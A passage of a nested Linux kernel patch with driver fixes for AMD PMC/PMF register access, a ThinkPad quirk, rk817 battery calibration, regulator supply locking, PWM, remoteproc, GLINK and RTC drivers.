+-			AMD_PMC_STB_INDEX_ADDRESS);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+ 	for (i = 0; i < FIFO_SIZE; i++) {
+-		err = pci_read_config_dword(dev->rdev, AMD_PMC_STB_INDEX_DATA, buf++);
++		err = amd_smn_read(0, AMD_PMC_STB_PMI_0, buf++);
+ 		if (err) {
+-			dev_err(dev->dev, "error reading data from stb: 0x%X\n",
+-				AMD_PMC_STB_INDEX_DATA);
++			dev_err(dev->dev, "error reading data from stb: 0x%X\n", AMD_PMC_STB_PMI_0);
+ 			return pcibios_err_to_errno(err);
+ 		}
+ 	}
+@@ -940,30 +943,18 @@ static int amd_pmc_probe(struct platform_device *pdev)
+ 
+ 	dev->cpu_id = rdev->device;
+ 	dev->rdev = rdev;
+-	err = pci_write_config_dword(rdev, AMD_PMC_SMU_INDEX_ADDRESS, AMD_PMC_BASE_ADDR_LO);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMC_SMU_INDEX_ADDRESS);
+-		err = pcibios_err_to_errno(err);
+-		goto err_pci_dev_put;
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMC_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMC_BASE_ADDR_LO, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error reading 0x%x\n", AMD_PMC_BASE_ADDR_LO);
+ 		err = pcibios_err_to_errno(err);
+ 		goto err_pci_dev_put;
+ 	}
+ 
+ 	base_addr_lo = val & AMD_PMC_BASE_ADDR_HI_MASK;
+ 
+-	err = pci_write_config_dword(rdev, AMD_PMC_SMU_INDEX_ADDRESS, AMD_PMC_BASE_ADDR_HI);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMC_SMU_INDEX_ADDRESS);
+-		err = pcibios_err_to_errno(err);
+-		goto err_pci_dev_put;
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMC_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMC_BASE_ADDR_HI, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error reading 0x%x\n", AMD_PMC_BASE_ADDR_HI);
+ 		err = pcibios_err_to_errno(err);
+ 		goto err_pci_dev_put;
+ 	}
+diff --git a/drivers/platform/x86/amd/pmf/Kconfig b/drivers/platform/x86/amd/pmf/Kconfig
+index 6d89528c31779..d87986adf91e1 100644
+--- a/drivers/platform/x86/amd/pmf/Kconfig
++++ b/drivers/platform/x86/amd/pmf/Kconfig
+@@ -7,6 +7,7 @@ config AMD_PMF
+ 	tristate "AMD Platform Management Framework"
+ 	depends on ACPI && PCI
+ 	depends on POWER_SUPPLY
++	depends on AMD_NB
+ 	select ACPI_PLATFORM_PROFILE
+ 	help
+ 	  This driver provides support for the AMD Platform Management Framework.
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index da23639071d79..0acc0b6221290 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -8,6 +8,7 @@
+  * Author: Shyam Sundar S K <Shyam-sundar.S-k@amd.com>
+  */
+ 
++#include <asm/amd_nb.h>
+ #include <linux/debugfs.h>
+ #include <linux/iopoll.h>
+ #include <linux/module.h>
+@@ -22,8 +23,6 @@
+ #define AMD_PMF_REGISTER_ARGUMENT	0xA58
+ 
+ /* Base address of SMU for mapping physical address to virtual address */
+-#define AMD_PMF_SMU_INDEX_ADDRESS	0xB8
+-#define AMD_PMF_SMU_INDEX_DATA		0xBC
+ #define AMD_PMF_MAPPING_SIZE		0x01000
+ #define AMD_PMF_BASE_ADDR_OFFSET	0x10000
+ #define AMD_PMF_BASE_ADDR_LO		0x13B102E8
+@@ -348,30 +347,19 @@ static int amd_pmf_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	dev->cpu_id = rdev->device;
+-	err = pci_write_config_dword(rdev, AMD_PMF_SMU_INDEX_ADDRESS, AMD_PMF_BASE_ADDR_LO);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMF_SMU_INDEX_ADDRESS);
+-		pci_dev_put(rdev);
+-		return pcibios_err_to_errno(err);
+-	}
+ 
+-	err = pci_read_config_dword(rdev, AMD_PMF_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMF_BASE_ADDR_LO, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error in reading from 0x%x\n", AMD_PMF_BASE_ADDR_LO);
+ 		pci_dev_put(rdev);
+ 		return pcibios_err_to_errno(err);
+ 	}
+ 
+ 	base_addr_lo = val & AMD_PMF_BASE_ADDR_HI_MASK;
+ 
+-	err = pci_write_config_dword(rdev, AMD_PMF_SMU_INDEX_ADDRESS, AMD_PMF_BASE_ADDR_HI);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMF_SMU_INDEX_ADDRESS);
+-		pci_dev_put(rdev);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMF_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMF_BASE_ADDR_HI, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error in reading from 0x%x\n", AMD_PMF_BASE_ADDR_HI);
+ 		pci_dev_put(rdev);
+ 		return pcibios_err_to_errno(err);
+ 	}
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 32c10457399e4..7191ff2625b1e 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -4478,6 +4478,14 @@ static const struct dmi_system_id fwbug_list[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "20UH"),
+ 		}
+ 	},
++	{
++		.ident = "T14s Gen1 AMD",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "20UJ"),
++		}
++	},
+ 	{
+ 		.ident = "P14s Gen1 AMD",
+ 		.driver_data = &quirk_s2idle_bug,
+diff --git a/drivers/power/supply/generic-adc-battery.c b/drivers/power/supply/generic-adc-battery.c
+index 66039c665dd1e..0af536f4932f1 100644
+--- a/drivers/power/supply/generic-adc-battery.c
++++ b/drivers/power/supply/generic-adc-battery.c
+@@ -135,6 +135,9 @@ static int read_channel(struct gab *adc_bat, enum power_supply_property psp,
+ 			result);
+ 	if (ret < 0)
+ 		pr_err("read channel error\n");
++	else
++		*result *= 1000;
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index 36f807b5ec442..f1b431aa0e4f2 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -335,6 +335,20 @@ static int rk817_bat_calib_cap(struct rk817_charger *charger)
+ 			charger->fcc_mah * 1000);
+ 	}
+ 
++	/*
++	 * Set the SOC to 0 if we are below the minimum system voltage.
++	 */
++	if (volt_avg <= charger->bat_voltage_min_design_uv) {
++		charger->soc = 0;
++		charge_now_adc = CHARGE_TO_ADC(0, charger->res_div);
++		put_unaligned_be32(charge_now_adc, bulk_reg);
++		regmap_bulk_write(rk808->regmap,
++				  RK817_GAS_GAUGE_Q_INIT_H3, bulk_reg, 4);
++		dev_warn(charger->dev,
++			 "Battery voltage %d below minimum voltage %d\n",
++			 volt_avg, charger->bat_voltage_min_design_uv);
++		}
++
+ 	rk817_record_battery_nvram_values(charger);
+ 
+ 	return 0;
+@@ -710,9 +724,10 @@ static int rk817_read_battery_nvram_values(struct rk817_charger *charger)
+ 
+ 	/*
+ 	 * Read the nvram for state of charge. Sanity check for values greater
+-	 * than 100 (10000). If the value is off it should get corrected
+-	 * automatically when the voltage drops to the min (soc is 0) or when
+-	 * the battery is full (soc is 100).
++	 * than 100 (10000) or less than 0, because other things (BSP kernels,
++	 * U-Boot, or even i2cset) can write to this register. If the value is
++	 * off it should get corrected automatically when the voltage drops to
++	 * the min (soc is 0) or when the battery is full (soc is 100).
+ 	 */
+ 	ret = regmap_bulk_read(charger->rk808->regmap,
+ 			       RK817_GAS_GAUGE_BAT_R1, bulk_reg, 3);
+@@ -721,6 +736,8 @@ static int rk817_read_battery_nvram_values(struct rk817_charger *charger)
+ 	charger->soc = get_unaligned_le24(bulk_reg);
+ 	if (charger->soc > 10000)
+ 		charger->soc = 10000;
++	if (charger->soc < 0)
++		charger->soc = 0;
+ 
+ 	return 0;
+ }
+@@ -731,8 +748,8 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ {
+ 	struct rk808 *rk808 = charger->rk808;
+ 	u8 bulk_reg[4];
+-	u32 boot_voltage, boot_charge_mah, tmp;
+-	int ret, reg, off_time;
++	u32 boot_voltage, boot_charge_mah;
++	int ret, reg, off_time, tmp;
+ 	bool first_boot;
+ 
+ 	/*
+@@ -785,10 +802,12 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 				 bulk_reg, 4);
+ 		tmp = get_unaligned_be32(bulk_reg);
++		if (tmp < 0)
++			tmp = 0;
+ 		boot_charge_mah = ADC_TO_CHARGE_UAH(tmp,
+ 						    charger->res_div) / 1000;
+ 		/*
+-		 * Check if the columb counter has been off for more than 300
++		 * Check if the columb counter has been off for more than 30
+ 		 * minutes as it tends to drift downward. If so, re-init soc
+ 		 * with the boot voltage instead. Note the unit values for the
+ 		 * OFF_CNT register appear to be in decaminutes and stops
+@@ -799,7 +818,7 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		 * than 0 on a reboot anyway.
+ 		 */
+ 		regmap_read(rk808->regmap, RK817_GAS_GAUGE_OFF_CNT, &off_time);
+-		if (off_time >= 30) {
++		if (off_time >= 3) {
+ 			regmap_bulk_read(rk808->regmap,
+ 					 RK817_GAS_GAUGE_PWRON_VOL_H,
+ 					 bulk_reg, 2);
+diff --git a/drivers/pwm/pwm-meson.c b/drivers/pwm/pwm-meson.c
+index 5cd7b90872c62..5732300eb0046 100644
+--- a/drivers/pwm/pwm-meson.c
++++ b/drivers/pwm/pwm-meson.c
+@@ -418,7 +418,7 @@ static const struct meson_pwm_data pwm_axg_ee_data = {
+ };
+ 
+ static const char * const pwm_axg_ao_parent_names[] = {
+-	"aoclk81", "xtal", "fclk_div4", "fclk_div5"
++	"xtal", "axg_ao_clk81", "fclk_div4", "fclk_div5"
+ };
+ 
+ static const struct meson_pwm_data pwm_axg_ao_data = {
+@@ -427,7 +427,7 @@ static const struct meson_pwm_data pwm_axg_ao_data = {
+ };
+ 
+ static const char * const pwm_g12a_ao_ab_parent_names[] = {
+-	"xtal", "aoclk81", "fclk_div4", "fclk_div5"
++	"xtal", "g12a_ao_clk81", "fclk_div4", "fclk_div5"
+ };
+ 
+ static const struct meson_pwm_data pwm_g12a_ao_ab_data = {
+@@ -436,7 +436,7 @@ static const struct meson_pwm_data pwm_g12a_ao_ab_data = {
+ };
+ 
+ static const char * const pwm_g12a_ao_cd_parent_names[] = {
+-	"xtal", "aoclk81",
++	"xtal", "g12a_ao_clk81",
+ };
+ 
+ static const struct meson_pwm_data pwm_g12a_ao_cd_data = {
+diff --git a/drivers/pwm/pwm-mtk-disp.c b/drivers/pwm/pwm-mtk-disp.c
+index 692a06121b286..fe9593f968eeb 100644
+--- a/drivers/pwm/pwm-mtk-disp.c
++++ b/drivers/pwm/pwm-mtk-disp.c
+@@ -138,6 +138,19 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	high_width = mul_u64_u64_div_u64(state->duty_cycle, rate, div);
+ 	value = period | (high_width << PWM_HIGH_WIDTH_SHIFT);
+ 
++	if (mdp->data->bls_debug && !mdp->data->has_commit) {
++		/*
++		 * For MT2701, disable double buffer before writing register
++		 * and select manual mode and use PWM_PERIOD/PWM_HIGH_WIDTH.
++		 */
++		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
++					 mdp->data->bls_debug_mask,
++					 mdp->data->bls_debug_mask);
++		mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
++					 mdp->data->con0_sel,
++					 mdp->data->con0_sel);
++	}
++
+ 	mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
+ 				 PWM_CLKDIV_MASK,
+ 				 clk_div << PWM_CLKDIV_SHIFT);
+@@ -152,17 +165,6 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		mtk_disp_pwm_update_bits(mdp, mdp->data->commit,
+ 					 mdp->data->commit_mask,
+ 					 0x0);
+-	} else {
+-		/*
+-		 * For MT2701, disable double buffer before writing register
+-		 * and select manual mode and use PWM_PERIOD/PWM_HIGH_WIDTH.
+-		 */
+-		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
+-					 mdp->data->bls_debug_mask,
+-					 mdp->data->bls_debug_mask);
+-		mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
+-					 mdp->data->con0_sel,
+-					 mdp->data->con0_sel);
+ 	}
+ 
+ 	mtk_disp_pwm_update_bits(mdp, DISP_PWM_EN, mdp->data->enable_mask,
+@@ -194,6 +196,16 @@ static int mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ 		return err;
+ 	}
+ 
++	/*
++	 * Apply DISP_PWM_DEBUG settings to choose whether to enable or disable
++	 * registers double buffer and manual commit to working register before
++	 * performing any read/write operation
++	 */
++	if (mdp->data->bls_debug)
++		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
++					 mdp->data->bls_debug_mask,
++					 mdp->data->bls_debug_mask);
++
+ 	rate = clk_get_rate(mdp->clk_main);
+ 	con0 = readl(mdp->base + mdp->data->con0);
+ 	con1 = readl(mdp->base + mdp->data->con1);
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index 4fcd36055b025..08726bc0da9d7 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -207,6 +207,78 @@ static void regulator_unlock(struct regulator_dev *rdev)
+ 	mutex_unlock(&regulator_nesting_mutex);
+ }
+ 
++/**
++ * regulator_lock_two - lock two regulators
++ * @rdev1:		first regulator
++ * @rdev2:		second regulator
++ * @ww_ctx:		w/w mutex acquire context
++ *
++ * Locks both rdevs using the regulator_ww_class.
++ */
++static void regulator_lock_two(struct regulator_dev *rdev1,
++			       struct regulator_dev *rdev2,
++			       struct ww_acquire_ctx *ww_ctx)
++{
++	struct regulator_dev *tmp;
++	int ret;
++
++	ww_acquire_init(ww_ctx, &regulator_ww_class);
++
++	/* Try to just grab both of them */
++	ret = regulator_lock_nested(rdev1, ww_ctx);
++	WARN_ON(ret);
++	ret = regulator_lock_nested(rdev2, ww_ctx);
++	if (ret != -EDEADLOCK) {
++		WARN_ON(ret);
++		goto exit;
++	}
++
++	while (true) {
++		/*
++		 * Start of loop: rdev1 was locked and rdev2 was contended.
++		 * Need to unlock rdev1, slowly lock rdev2, then try rdev1
++		 * again.
++		 */
++		regulator_unlock(rdev1);
++
++		ww_mutex_lock_slow(&rdev2->mutex, ww_ctx);
++		rdev2->ref_cnt++;
++		rdev2->mutex_owner = current;
++		ret = regulator_lock_nested(rdev1, ww_ctx);
++
++		if (ret == -EDEADLOCK) {
++			/* More contention; swap which needs to be slow */
++			tmp = rdev1;
++			rdev1 = rdev2;
++			rdev2 = tmp;
++		} else {
++			WARN_ON(ret);
++			break;
++		}
++	}
++
++exit:
++	ww_acquire_done(ww_ctx);
++}
++
++/**
++ * regulator_unlock_two - unlock two regulators
++ * @rdev1:		first regulator
++ * @rdev2:		second regulator
++ * @ww_ctx:		w/w mutex acquire context
++ *
++ * The inverse of regulator_lock_two().
++ */
++
++static void regulator_unlock_two(struct regulator_dev *rdev1,
++				 struct regulator_dev *rdev2,
++				 struct ww_acquire_ctx *ww_ctx)
++{
++	regulator_unlock(rdev2);
++	regulator_unlock(rdev1);
++	ww_acquire_fini(ww_ctx);
++}
++
+ static bool regulator_supply_is_couple(struct regulator_dev *rdev)
+ {
+ 	struct regulator_dev *c_rdev;
+@@ -334,6 +406,7 @@ static void regulator_lock_dependent(struct regulator_dev *rdev,
+ 			ww_mutex_lock_slow(&new_contended_rdev->mutex, ww_ctx);
+ 			old_contended_rdev = new_contended_rdev;
+ 			old_contended_rdev->ref_cnt++;
++			old_contended_rdev->mutex_owner = current;
+ 		}
+ 
+ 		err = regulator_lock_recursive(rdev,
+@@ -1583,9 +1656,6 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 			rdev->constraints->always_on = true;
+ 	}
+ 
+-	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get_boottime();
+-
+ 	/* If the constraints say the regulator should be on at this point
+ 	 * and we have control then make sure it is enabled.
+ 	 */
+@@ -1619,6 +1689,8 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 
+ 		if (rdev->constraints->always_on)
+ 			rdev->use_count++;
++	} else if (rdev->desc->off_on_delay) {
++		rdev->last_off = ktime_get();
+ 	}
+ 
+ 	print_constraints(rdev);
+@@ -1627,8 +1699,8 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 
+ /**
+  * set_supply - set regulator supply regulator
+- * @rdev: regulator name
+- * @supply_rdev: supply regulator name
++ * @rdev: regulator (locked)
++ * @supply_rdev: supply regulator (locked))
+  *
+  * Called by platform initialisation code to set the supply regulator for this
+  * regulator. This ensures that a regulators supply will also be enabled by the
+@@ -1800,6 +1872,8 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 	struct regulator *regulator;
+ 	int err = 0;
+ 
++	lockdep_assert_held_once(&rdev->mutex.base);
++
+ 	if (dev) {
+ 		char buf[REG_STR_SIZE];
+ 		int size;
+@@ -1827,9 +1901,7 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 	regulator->rdev = rdev;
+ 	regulator->supply_name = supply_name;
+ 
+-	regulator_lock(rdev);
+ 	list_add(&regulator->list, &rdev->consumer_list);
+-	regulator_unlock(rdev);
+ 
+ 	if (dev) {
+ 		regulator->dev = dev;
+@@ -1995,6 +2067,7 @@ static int regulator_resolve_supply(struct regulator_dev *rdev)
+ {
+ 	struct regulator_dev *r;
+ 	struct device *dev = rdev->dev.parent;
++	struct ww_acquire_ctx ww_ctx;
+ 	int ret = 0;
+ 
+ 	/* No supply to resolve? */
+@@ -2061,23 +2134,23 @@ static int regulator_resolve_supply(struct regulator_dev *rdev)
+ 	 * between rdev->supply null check and setting rdev->supply in
+ 	 * set_supply() from concurrent tasks.
+ 	 */
+-	regulator_lock(rdev);
++	regulator_lock_two(rdev, r, &ww_ctx);
+ 
+ 	/* Supply just resolved by a concurrent task? */
+ 	if (rdev->supply) {
+-		regulator_unlock(rdev);
++		regulator_unlock_two(rdev, r, &ww_ctx);
+ 		put_device(&r->dev);
+ 		goto out;
+ 	}
+ 
+ 	ret = set_supply(rdev, r);
+ 	if (ret < 0) {
+-		regulator_unlock(rdev);
++		regulator_unlock_two(rdev, r, &ww_ctx);
+ 		put_device(&r->dev);
+ 		goto out;
+ 	}
+ 
+-	regulator_unlock(rdev);
++	regulator_unlock_two(rdev, r, &ww_ctx);
+ 
+ 	/*
+ 	 * In set_machine_constraints() we may have turned this regulator on
+@@ -2190,7 +2263,9 @@ struct regulator *_regulator_get(struct device *dev, const char *id,
+ 		return regulator;
+ 	}
+ 
++	regulator_lock(rdev);
+ 	regulator = create_regulator(rdev, dev, id);
++	regulator_unlock(rdev);
+ 	if (regulator == NULL) {
+ 		regulator = ERR_PTR(-ENOMEM);
+ 		module_put(rdev->owner);
+@@ -2668,7 +2743,7 @@ static int _regulator_do_enable(struct regulator_dev *rdev)
+ 
+ 	trace_regulator_enable(rdev_get_name(rdev));
+ 
+-	if (rdev->desc->off_on_delay && rdev->last_off) {
++	if (rdev->desc->off_on_delay) {
+ 		/* if needed, keep a distance of off_on_delay from last time
+ 		 * this regulator was disabled.
+ 		 */
+@@ -6049,6 +6124,7 @@ static void regulator_summary_lock(struct ww_acquire_ctx *ww_ctx)
+ 			ww_mutex_lock_slow(&new_contended_rdev->mutex, ww_ctx);
+ 			old_contended_rdev = new_contended_rdev;
+ 			old_contended_rdev->ref_cnt++;
++			old_contended_rdev->mutex_owner = current;
+ 		}
+ 
+ 		err = regulator_summary_lock_all(ww_ctx,
+diff --git a/drivers/regulator/stm32-pwr.c b/drivers/regulator/stm32-pwr.c
+index 2a42acb7c24e9..e5dd4db6403b2 100644
+--- a/drivers/regulator/stm32-pwr.c
++++ b/drivers/regulator/stm32-pwr.c
+@@ -129,17 +129,16 @@ static const struct regulator_desc stm32_pwr_desc[] = {
+ 
+ static int stm32_pwr_regulator_probe(struct platform_device *pdev)
+ {
+-	struct device_node *np = pdev->dev.of_node;
+ 	struct stm32_pwr_reg *priv;
+ 	void __iomem *base;
+ 	struct regulator_dev *rdev;
+ 	struct regulator_config config = { };
+ 	int i, ret = 0;
+ 
+-	base = of_iomap(np, 0);
+-	if (!base) {
++	base = devm_platform_ioremap_resource(pdev, 0);
++	if (IS_ERR(base)) {
+ 		dev_err(&pdev->dev, "Unable to map IO memory\n");
+-		return -ENOMEM;
++		return PTR_ERR(base);
+ 	}
+ 
+ 	config.dev = &pdev->dev;
+diff --git a/drivers/remoteproc/xlnx_r5_remoteproc.c b/drivers/remoteproc/xlnx_r5_remoteproc.c
+index 2db57d3941555..5dd007622603d 100644
+--- a/drivers/remoteproc/xlnx_r5_remoteproc.c
++++ b/drivers/remoteproc/xlnx_r5_remoteproc.c
+@@ -61,8 +61,6 @@ static const struct mem_bank_data zynqmp_tcm_banks[] = {
+  * @np: device node of RPU instance
+  * @tcm_bank_count: number TCM banks accessible to this RPU
+  * @tcm_banks: array of each TCM bank data
+- * @rmem_count: Number of reserved mem regions
+- * @rmem: reserved memory region nodes from device tree
+  * @rproc: rproc handle
+  * @pm_domain_id: RPU CPU power domain id
+  */
+@@ -71,8 +69,6 @@ struct zynqmp_r5_core {
+ 	struct device_node *np;
+ 	int tcm_bank_count;
+ 	struct mem_bank_data **tcm_banks;
+-	int rmem_count;
+-	struct reserved_mem **rmem;
+ 	struct rproc *rproc;
+ 	u32 pm_domain_id;
+ };
+@@ -239,21 +235,29 @@ static int add_mem_regions_carveout(struct rproc *rproc)
+ {
+ 	struct rproc_mem_entry *rproc_mem;
+ 	struct zynqmp_r5_core *r5_core;
++	struct of_phandle_iterator it;
+ 	struct reserved_mem *rmem;
+-	int i, num_mem_regions;
++	int i = 0;
+ 
+ 	r5_core = (struct zynqmp_r5_core *)rproc->priv;
+-	num_mem_regions = r5_core->rmem_count;
+ 
+-	for (i = 0; i < num_mem_regions; i++) {
+-		rmem = r5_core->rmem[i];
++	/* Register associated reserved memory regions */
++	of_phandle_iterator_init(&it, r5_core->np, "memory-region", NULL, 0);
+ 
+-		if (!strncmp(rmem->name, "vdev0buffer", strlen("vdev0buffer"))) {
++	while (of_phandle_iterator_next(&it) == 0) {
++		rmem = of_reserved_mem_lookup(it.node);
++		if (!rmem) {
++			of_node_put(it.node);
++			dev_err(&rproc->dev, "unable to acquire memory-region\n");
++			return -EINVAL;
++		}
++
++		if (!strcmp(it.node->name, "vdev0buffer")) {
+ 			/* Init reserved memory for vdev buffer */
+ 			rproc_mem = rproc_of_resm_mem_entry_init(&rproc->dev, i,
+ 								 rmem->size,
+ 								 rmem->base,
+-								 rmem->name);
++								 it.node->name);
+ 		} else {
+ 			/* Register associated reserved memory regions */
+ 			rproc_mem = rproc_mem_entry_init(&rproc->dev, NULL,
+@@ -261,16 +265,19 @@ static int add_mem_regions_carveout(struct rproc *rproc)
+ 							 rmem->size, rmem->base,
+ 							 zynqmp_r5_mem_region_map,
+ 							 zynqmp_r5_mem_region_unmap,
+-							 rmem->name);
++							 it.node->name);
+ 		}
+ 
+-		if (!rproc_mem)
++		if (!rproc_mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, rproc_mem);
+ 
+ 		dev_dbg(&rproc->dev, "reserved mem carveout %s addr=%llx, size=0x%llx",
+-			rmem->name, rmem->base, rmem->size);
++			it.node->name, rmem->base, rmem->size);
++		i++;
+ 	}
+ 
+ 	return 0;
+@@ -726,59 +733,6 @@ static int zynqmp_r5_get_tcm_node(struct zynqmp_r5_cluster *cluster)
+ 	return 0;
+ }
+ 
+-/**
+- * zynqmp_r5_get_mem_region_node()
+- * parse memory-region property and get reserved mem regions
+- *
+- * @r5_core: pointer to zynqmp_r5_core type object
+- *
+- * Return: 0 for success and error code for failure.
+- */
+-static int zynqmp_r5_get_mem_region_node(struct zynqmp_r5_core *r5_core)
+-{
+-	struct device_node *np, *rmem_np;
+-	struct reserved_mem **rmem;
+-	int res_mem_count, i;
+-	struct device *dev;
+-
+-	dev = r5_core->dev;
+-	np = r5_core->np;
+-
+-	res_mem_count = of_property_count_elems_of_size(np, "memory-region",
+-							sizeof(phandle));
+-	if (res_mem_count <= 0) {
+-		dev_warn(dev, "failed to get memory-region property %d\n",
+-			 res_mem_count);
+-		return 0;
+-	}
+-
+-	rmem = devm_kcalloc(dev, res_mem_count,
+-			    sizeof(struct reserved_mem *), GFP_KERNEL);
+-	if (!rmem)
+-		return -ENOMEM;
+-
+-	for (i = 0; i < res_mem_count; i++) {
+-		rmem_np = of_parse_phandle(np, "memory-region", i);
+-		if (!rmem_np)
+-			goto release_rmem;
+-
+-		rmem[i] = of_reserved_mem_lookup(rmem_np);
+-		if (!rmem[i]) {
+-			of_node_put(rmem_np);
+-			goto release_rmem;
+-		}
+-
+-		of_node_put(rmem_np);
+-	}
+-
+-	r5_core->rmem_count = res_mem_count;
+-	r5_core->rmem = rmem;
+-	return 0;
+-
+-release_rmem:
+-	return -EINVAL;
+-}
+-
+ /*
+  * zynqmp_r5_core_init()
+  * Create and initialize zynqmp_r5_core type object
+@@ -806,10 +760,6 @@ static int zynqmp_r5_core_init(struct zynqmp_r5_cluster *cluster,
+ 	for (i = 0; i < cluster->core_count; i++) {
+ 		r5_core = cluster->r5_cores[i];
+ 
+-		ret = zynqmp_r5_get_mem_region_node(r5_core);
+-		if (ret)
+-			dev_warn(dev, "memory-region prop failed %d\n", ret);
+-
+ 		/* Initialize r5 cores with power-domains parsed from dts */
+ 		ret = of_property_read_u32_index(r5_core->np, "power-domains",
+ 						 1, &r5_core->pm_domain_id);
+diff --git a/drivers/rpmsg/qcom_glink_native.c b/drivers/rpmsg/qcom_glink_native.c
+index 35df1b0a515bf..67e7664efb0dc 100644
+--- a/drivers/rpmsg/qcom_glink_native.c
++++ b/drivers/rpmsg/qcom_glink_native.c
+@@ -1348,8 +1348,9 @@ static int __qcom_glink_send(struct glink_channel *channel,
+ 	ret = qcom_glink_tx(glink, &req, sizeof(req), data, chunk_size, wait);
+ 
+ 	/* Mark intent available if we failed */
+-	if (ret && intent) {
+-		intent->in_use = false;
++	if (ret) {
++		if (intent)
++			intent->in_use = false;
+ 		return ret;
+ 	}
+ 
+@@ -1370,8 +1371,9 @@ static int __qcom_glink_send(struct glink_channel *channel,
+ 				    chunk_size, wait);
+ 
+ 		/* Mark intent available if we failed */
+-		if (ret && intent) {
+-			intent->in_use = false;
++		if (ret) {
++			if (intent)
++				intent->in_use = false;
+ 			break;
+ 		}
+ 	}
+diff --git a/drivers/rtc/rtc-meson-vrtc.c b/drivers/rtc/rtc-meson-vrtc.c
+index 1463c86215615..648fa362ec447 100644
+--- a/drivers/rtc/rtc-meson-vrtc.c
++++ b/drivers/rtc/rtc-meson-vrtc.c
+@@ -23,7 +23,7 @@ static int meson_vrtc_read_time(struct device *dev, struct rtc_time *tm)
+ 	struct timespec64 time;
+ 
+ 	dev_dbg(dev, "%s\n", __func__);
+-	ktime_get_raw_ts64(&time);
++	ktime_get_real_ts64(&time);
+ 	rtc_time64_to_tm(time.tv_sec, tm);
+ 
+ 	return 0;
+@@ -96,7 +96,7 @@ static int __maybe_unused meson_vrtc_suspend(struct device *dev)
+ 		long alarm_secs;
+ 		struct timespec64 time;
+ 
+-		ktime_get_raw_ts64(&time);
++		ktime_get_real_ts64(&time);
+ 		local_time = time.tv_sec;
+ 
+ 		dev_dbg(dev, "alarm_time = %lus, local_time=%lus\n",
+diff --git a/drivers/rtc/rtc-omap.c b/drivers/rtc/rtc-omap.c
+index 4d4f3b1a73093..73634a3ccfd3b 100644
+--- a/drivers/rtc/rtc-omap.c
++++ b/drivers/rtc/rtc-omap.c
+@@ -25,6 +25,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/rtc.h>
++#include <linux/rtc/rtc-omap.h>
+ 
+ /*
+  * The OMAP RTC is a year/month/day/hours/minutes/seconds BCD clock
+diff --git a/drivers/rtc/rtc-ti-k3.c b/drivers/rtc/rtc-ti-k3.c
+index ba23163cc0428..0d90fe9233550 100644
+--- a/drivers/rtc/rtc-ti-k3.c
++++ b/drivers/rtc/rtc-ti-k3.c
+@@ -632,7 +632,8 @@ static int __maybe_unused ti_k3_rtc_suspend(struct device *dev)
+ 	struct ti_k3_rtc *priv = dev_get_drvdata(dev);
+ 
+ 	if (device_may_wakeup(dev))
+-		enable_irq_wake(priv->irq);
++		return enable_irq_wake(priv->irq);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index 5a6d9c15395f7..bce3422d85640 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
